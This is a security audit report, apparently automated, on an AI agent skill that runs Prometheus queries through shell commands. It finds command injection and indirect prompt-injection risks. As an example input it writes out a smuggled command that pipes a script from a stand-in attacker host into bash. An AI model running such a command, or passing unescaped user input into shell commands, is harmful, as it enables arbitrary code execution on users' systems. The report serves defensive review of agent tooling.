prometheus-skill
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions in SKILL.md direct the agent to run shell commands using 'uv run prometheus.py'. These commands incorporate user-provided strings (such as application names) directly into the shell string without any form of validation or escaping. This creates a direct command injection vector where a malicious user could provide an input like 'application_name"; curl attacker.com/exploit | bash; "' to execute arbitrary code.
- [PROMPT_INJECTION] (LOW): The skill is susceptible to indirect prompt injection (Category 8) because it ingests untrusted data and uses it in a functional capacity. 1. Ingestion points: User-provided application names and project IDs in SKILL.md. 2. Boundary markers: Absent; no delimiters or 'ignore' instructions are provided. 3. Capability inventory: Execution of shell commands via 'uv run'. 4. Sanitization: Absent; the Python utility does not sanitize the query string before it is used in a URL, and the instructions do not advise the agent to sanitize inputs.
- [CREDENTIALS_UNSAFE] (SAFE): No hardcoded credentials were found. The 'prom_host' variable in 'prometheus.py' is set to a placeholder value ('your prometheus host').
Recommendations
- AI detected serious security threats
Audit Metadata